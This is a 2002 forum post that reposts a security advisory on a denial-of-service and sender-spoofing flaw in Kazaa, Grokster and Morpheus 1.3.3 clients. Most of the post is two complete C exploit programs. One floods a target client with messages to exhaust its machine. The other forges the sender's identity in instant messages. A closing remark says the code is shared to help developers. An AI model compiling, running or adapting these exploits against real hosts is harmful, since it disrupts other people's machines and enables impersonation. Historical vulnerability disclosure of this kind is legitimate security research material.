|
Napsterite
Join Date: Apr 2002
Posts: 138
|
Here is some interesting reading taken from:
www.securiteam.com
Quote:
Title 27/2/2002
Kazaa, Grokster and Morpheus Remote Denial of Service
Summary
Kazaa, Grokster, and Morpheus suffer from a remote denial of service vulnerability. Furthermore, the vulnerability also allows identity hijacking, allowing an attacker to send a message to the target faking someone else's name.
Details
Vulnerable systems:
Kazaa, Grokster, and Morpheus clients for Windows version 1.3.3
Immune systems:
Kazaa, Grokster, and Morpheus clients for Windows version 1.5
There is a remote denial of service in fasttrack person-to-person technology, used by Kazaa, Grokster, and Morpheus that can allow an attacker to crash the program and in certain cases hang the machine.
In the same service, identity can be faked by a malicious attacker to involve remote user in desired operations.
Solution:
The vendor has released a new version that is not vulnerable to the mentioned vulnerability.
Exploit code (DoS):
/* kazaa-xploit.c code
*
* Filename : kazaa-xploit.c
* Version : 0.1
* Coder(s) : mrjade [WkT!] <mrjade@softhome.net>
* Date : 9/2/2K2
* Abstract : Send X messages to any kazaa, grokster and morpheus client
* version 1.3.3 for windows exhausting the system.
*
* Compile: #gcc -o kazaa-xploit kazaa-exploit.c
* Usage: #./kazaa-xploit host/ip nmessages
* Example: #./kazaa-xploit 192.168.0.5 1000
*
* This will send 1000 messages to given kazaa client.
* proof of concept for the same advisorie. Source code
* extracted from kazaa-msg.c program written by mrjade, for
* sending readable messages to any kazaa user.
*
* License conditions:
*
* Copyright (c) 2002 mrjade - <mrjade@softhome.net>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
* NOTES:
* Improves of this code can generate diferent id@domain names for
* each connection.
*
* For 300mb of RAM 1000 messages will be a good example.
*/
/* ---== Include section ==--- */
#include <netdb.h>
#include <arpa/inet.h>
#include <stdio.h> /* stdout() */
#include <string.h> /* strstr(), strchr() */
#include <malloc.h> /* malloc() */
/* ---== Defines section ==--- */
/* kazaa-head id, dominio, to */
#define kazaa_head "\
GET /.message HTTP/1.1\n\
X-Kazaa-Username: %s\n\
X-Kazaa-Network: %s\n\
X-Kazaa-IMTo: %s\n\
X-Kazaa-IMType: user_text\n\
X-Kazaa-IMData: aaa\n\
\n\n\n"
#define http_basic "GET / HTTP/1.0\nHost: localhost\n\n"
#define id_ "user" /* Default id for sending msg */
#define minetwork "domain.com" /* Default id for sending msg */
#define PORT 1214 /* Default port for sending data */
/* ---== Procedure section ==--- */
/* Usage Banner..*/
void usage(char *pname) {
printf (" :: Usage : %s ip/host n_messages\n", pname);
printf (" :: 1000 for 300mb of RAM aprox.\n", pname);
fflush (stdout);
exit(-1);
}
/* Resolv hostname */
unsigned long resol(char *host) {
struct in_addr addr;
struct hostent *host_ent;
if((addr.s_addr = inet_addr(host)) == -1) {
printf(" :: Resolving host: %s\n", host);
if(!(host_ent = gethostbyname(host))) return(0);
memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
} return(addr.s_addr);
}
char *get_token (char *buffer, char *token){
char *stri, *strf;
if ((stri = strstr (buffer, token))){
stri = stri + strlen(token);
strf = strchr (stri, 0xA);
strf[-1]= 0;
} else {
return (NULL);
}
return (stri);
}
/* ---== MAIN Procedure ==--- */
int main(int argc, char *argv[]) {
int sock, c_, cont;
char *host;
struct sockaddr_in TheHoSt;
char *btmp;
char *user_name, *id; /* user_name = id = remote user name */
char *user_net, *network; /* user_net = network = remote user network */
char buffer[512]; /* Rec. buffer*/
int a=0;
printf("\n :: xploit code for kazaa, morpheus and grokster users..");
printf("\n :: (C)2002 mrjade [WkT!] <mrjade@softhome.net>\n");
if( argc < 3) {
usage( argv[0] );
}
/* Host resolv and connect */
host = argv[1];
TheHoSt.sin_family = AF_INET;
TheHoSt.sin_addr.s_addr = resol(host);
if(!TheHoSt.sin_addr.s_addr) {
printf(" :: ERROR: host not found.\n\n");
exit(-1);
}
/* We must get remote user name, need it to send any request */
TheHoSt.sin_port = htons(PORT);
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0) {
printf(" :: ERROR: Can't open socket\n\n");
exit(-1);
}
bzero(buffer,sizeof(buffer));
if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {
printf(" ::\n :: Getting username@network: "); fflush(stdout);
/* Search for username@userdomiain on host */
send(sock,http_basic,strlen(http_basic),0);
recv(sock,buffer,sizeof(buffer),0);
close(sock);
if ((user_net = get_token(buffer, "Network: ")) && \
(user_name = get_token(buffer, "Username: "))){
printf ("%s@%s\n", user_name, user_net);
fflush (stdout);
} else {
printf ("ERR\n :: No username or network detected\n\n");
fflush (stdout);
exit (-1);
}
/* Storing strings */
network = malloc (strlen(user_net)+1);
bzero (network, strlen(user_net)+1);
memcpy (network, user_net, strlen(user_net));
id = malloc (strlen(user_name)+1);
bzero (id, strlen(user_name)+1);
memcpy (id, user_name, strlen(user_name));
} else {
printf(" :: ERR Can't connect.\n\n");
fflush(stdout);
exit (-1);
}
/* number of msg to send*/
cont = strtol (argv[argc-1],0,10);
if (cont < 1){
cont= 1000;
}
printf(" :: Sending %d messages:\n", cont);
fflush(stdout);
/* create HTTP request */
c_ = strlen(kazaa_head)+strlen(id_)+strlen(id)+strlen(minetwork)+ 3;
btmp = malloc( c_);
bzero(btmp, c_);
sprintf (btmp, kazaa_head, id_, minetwork, id);
/* Bucle */
for (a=0; a < cont; a++){
/* Now send the message request */
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0) {
printf(" :: ERROR: Can't open socket\n\n");
exit(-1);
}
printf(".");fflush(stdout);
bzero(buffer,sizeof(buffer));
if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {
send(sock,btmp,strlen(btmp),0);
recv(sock,buffer,sizeof(buffer),0);
if (strstr(buffer, "200")){ // HTTP OK
printf(".");fflush(stdout);
} else {
printf("\n :: Can't deliver message. \n\n");fflush(stdout);
close(sock);
exit(-1);
}
bzero(buffer,sizeof(buffer)); //Clear Buffer
} else {
close(sock);
printf("\n :: Can't connect. Service down \n\n");
exit(-1);
}
close (sock);
} /* for */
return (0);
}
Exploit code (Message spoofing):
/* kazaa-msg.c code
*
* Filename : kazaa-msg.c
* Version : 0.1
* Coder(s) : mrjade [WkT!] <mrjade@softhome.net>
* Date : 9/2/2K2
* Abstract : Send a message to any kazaa, grokster and morpheus user,
* knowing their ip/hostname. Programmed for hackindex team.
* http://www.hackindex.com
*
* Compile: #gcc -o kazaa-msg kazaa-msg.c
*
* Usage: #./kazaa-msg host/ip message
*
* Example: #./kazaa-msg 192.168.0.5 Hey.. i can send you a message..
*
* This will send a message to given kazaa user (host). Actually this is
* just a proof of concept. requiered fields for send a message are:
*
* X-Kazaa-Username
* X-Kazaa-Network
*
* These will form the "FROM" : name@network
* modify the id_ and minetwork defines to change "FROM" field.
*
* X-Kazaa-IMTo "TO" field. Remote kazaa's login
* (kazaa, grokster, morpheus)
* It's retrieved from a first connection to
* host.
* X-Kazaa-IMType user_text Type of data (fixed)
* X-Kazaa-IMData Message radix64 encoded.
*
* For grokster (tested) and morpheus (not tested) the name of the fields
* in the HTTP header are the same.
*
* If you want to receive any answer from the remote user, you must open
* a tcp socket listening on port 1214. HTTP header will be the same, and
* message must be decoded using Radix64 algorithm.
*
* License conditions:
*
* Copyright (c) 2002 mrjade - <mrjade@softhome.net>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
*
* Other Copyright:
*
* radix64 encode table and enc64() by Carl M. Ellison *
*
* NOTES:
* Not tested at all.. it my be bugged.
*/
/* ---== Include section ==--- */
#include <netdb.h>
#include <arpa/inet.h>
#include <stdio.h> /* stdout() */
#include <string.h> /* strstr(), strchr() */
#include <malloc.h> /* malloc() */
/* ---== Defines section ==--- */
/* kazaa-head id, dominio, to, msg-radix64 */
#define kazaa_head "\
GET /.message HTTP/1.1\n\
Host: localhost\n\
UserAgent: KazaaClient Aug 29 2001 19:42:46\n\
X-Kazaa-Username: %s\n\
X-Kazaa-Network: %s\n\
Connection: close\n\
X-Kazaa-IMTo: %s\n\
X-Kazaa-IMType: user_text\n\
X-Kazaa-IMData: %s\n\
\n\n\n"
#define http_basic "GET / HTTP/1.0\nHost: localhost\n\n"
#define id_ "admin" /* Default id for sending msg */
#define minetwork "hackindex" /* Default id for sending msg */
#define PORT 1214 /* Default port for sending data */
/* ---== Global variables ==--- */
char enctab[64] = { /* radix64 encoding table */
'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O', 'P',
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e', 'f',
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u', 'v',
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+', '/'
};
/* ---== Procedure section ==--- */
/* Usage Banner..*/
void usage(char *pname) {
printf (" :: Usage : %s ip/host mensaje\n", pname);
fflush (stdout);
exit(-1);
}
/* Resolv hostname */
unsigned long resol(char *host) {
struct in_addr addr;
struct hostent *host_ent;
if((addr.s_addr = inet_addr(host)) == -1) {
printf(" :: Resolving host: %s\n", host);
if(!(host_ent = gethostbyname(host))) return(0);
memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
} return(addr.s_addr);
}
char *get_token (char *buffer, char *token){
char *stri, *strf;
if ((stri = strstr (buffer, token))){
stri = stri + strlen(token);
strf = strchr (stri, 0xA);
strf[-1]= 0;
} else {
return (NULL);
}
return (stri);
}
void enc64( outbuff, out_lth, polth, inbuff, inb_lth, line_lth, n_space )
char *outbuff ; /* output buffer */
long out_lth ; /* allocated length of the output buffer */
long *polth ; /* actual length of output */
unsigned char *inbuff ; /* input (binary) buffer */
long inb_lth ; /* length of inbuff */
long line_lth ; /* maximum line lth (-1 means infinite) */
long n_space ; /* # spaces at start of each text line */
{
long nl ; /* # chars left in this line */
char *b, *c ; /* walking pointers */
nl = line_lth ;
b = inbuff ;
c = outbuff ;
while ( (inb_lth > 0)
&&(out_lth > 5) ) {
/* encoding */
c[0]=enctab[(b[0]>>2)&0x3f] ;
c[1]=enctab[((b[0]&0x3)<<4)|((b[1]>>4)&0xf)] ;
c[2]=enctab[((b[1]&0xf)<<2)|((b[2]>>6)&0x3)] ;
c[3]=enctab[b[2]&0x3f] ;
out_lth -= 4 ; /* count the code bytes */
switch (inb_lth) { /* take care of the final bytes */
case 1: c[2]='=' ; /* only 1, so == */
case 2: c[3]='=' ; /* 2, so = */
inb_lth = 0 ; /* either way, we're done */
c += 4 ; /* but no spaces */
*(c++) = '\n' ; /* and there's an end of line */
break ;
default:
inb_lth -= 3;
b += 3 ;
c += 4 ;
nl -= 4 ;
if (nl <= 0) {
long i ;
*(c++) = '\n' ;
nl = line_lth ;
for (i=0;i<n_space;i++)
*(c++) = ' ' ;
out_lth -= 1 + n_space ;
}
break ;
} /* switch */
} /* while */
*polth = c - outbuff ;
} /* enc64 */
/* ---== MAIN Procedure ==--- */
int main(int argc, char *argv[]) {
int sock, c_, cont;
char *host;
struct sockaddr_in TheHoSt;
char *btmp;
char *user_name, *id; /* user_name = id = remote user name */
char *user_net, *network; /* user_net = network = remote user network */
char *msg, *msgr64; /* Radix 64 stuf */
long olth; /* Radix 64 stuf */
char buffer[512]; /* Rec. buffer*/
printf("\n :: Message sending 4 kazaa, morpheus and grokster users..");
printf("\n :: (C)2002 mrjade [WkT!] <mrjade@softhome.net>\n");
if( argc < 3) {
usage( argv[0] );
}
/* Host resolv and connect */
host = argv[1];
TheHoSt.sin_family = AF_INET;
TheHoSt.sin_addr.s_addr = resol(host);
if(!TheHoSt.sin_addr.s_addr) {
printf(" :: ERROR: host not found.\n\n");
exit(-1);
}
/* We must get remote user name, need it to send any request */
TheHoSt.sin_port = htons(PORT);
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0) {
printf(" :: ERROR: Can't open socket\n\n");
exit(-1);
}
bzero(buffer,sizeof(buffer));
if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {
printf(" ::\n :: Getting username@network: "); fflush(stdout);
/* Search for username@userdomiain on host */
send(sock,http_basic,strlen(http_basic),0);
recv(sock,buffer,sizeof(buffer),0);
close(sock);
if ((user_net = get_token(buffer, "Network: ")) && (user_name = get_token(buffer, "Username: "))){
printf ("%s@%s\n", user_name, user_net); fflush (stdout);
} else {
printf ("ERR\n :: No username or network detected\n\n"); fflush (stdout);
exit (-1);
}
/* Storing strings */
network = malloc (strlen(user_net)+1);
bzero (network, strlen(user_net)+1);
memcpy (network, user_net, strlen(user_net));
id = malloc (strlen(user_name)+1);
bzero (id, strlen(user_name)+1);
memcpy (id, user_name, strlen(user_name));
} else {
printf(" :: ERROR: Can't connect\n\n"); fflush(stdout);
exit (-1);
}
/* Now send the message request */
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0) {
printf(" :: ERROR: Can't open socket\n\n");
exit(-1);
}
bzero(buffer,sizeof(buffer));
if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {
printf(" :: Sending message to %s from %s@%s\n", id, id_, minetwork);fflush(stdout);
/* Get msg length */
cont=2; c_=0;
while (cont < argc){
c_ = c_ + strlen(argv[cont++])+1;
}
/* Allocate buffer */
msg = malloc (c_);
bzero (msg, c_);
/* Store msg in buffer */
cont=2;
while (cont < argc){
strcat(msg,argv[cont]);
strcat(msg, " ");
cont++;
}
msg[strlen(msg)]=0;
/* Output buffer for radix64 conv */
msgr64 = malloc (2*c_);
bzero (msgr64, 2*c_);
/* Convert msg to radix 64 */
enc64( msgr64, 2*c_, &olth, msg, c_, 9999, 0 );
/* Store in buffer */
c_ = strlen (msgr64)+strlen(kazaa_head)+strlen(id_)+strlen(id)+strlen(mi network)+3;
btmp = malloc(c_);
bzero(btmp, c_);
sprintf (btmp, kazaa_head, id_, minetwork, id, msgr64);
send(sock,btmp,strlen(btmp),0);
while ((recv(sock,buffer,sizeof(buffer),0)!=-1) && (buffer[0] !=0)){
if (strstr(buffer, "200")){ // HTTP OK
printf(" :: Message sent.\n\n");
close(sock);
exit(0);
}
bzero(buffer,sizeof(buffer)); //Clear Buffer
}
printf(" :: Can't deliver message\n\n\n\n");
} else {
close(sock);
printf(" :: Can't connect. Service unavailable.\n\n");
exit(-1);
}
close(sock); //Remote host will close it when finished
return (-1);
}
Additional information
The information has been provided by mrjade 2k2.
|
please note that the reasons these program's codes were posted is to help developer's like AYB and Indy (Scyth too) who may actually be interested in making something useful not destructive.
Usually the innovations we seek are most times to found in through their misuse. These programs and their code exist freely on the internet are believed to be a part of public domain |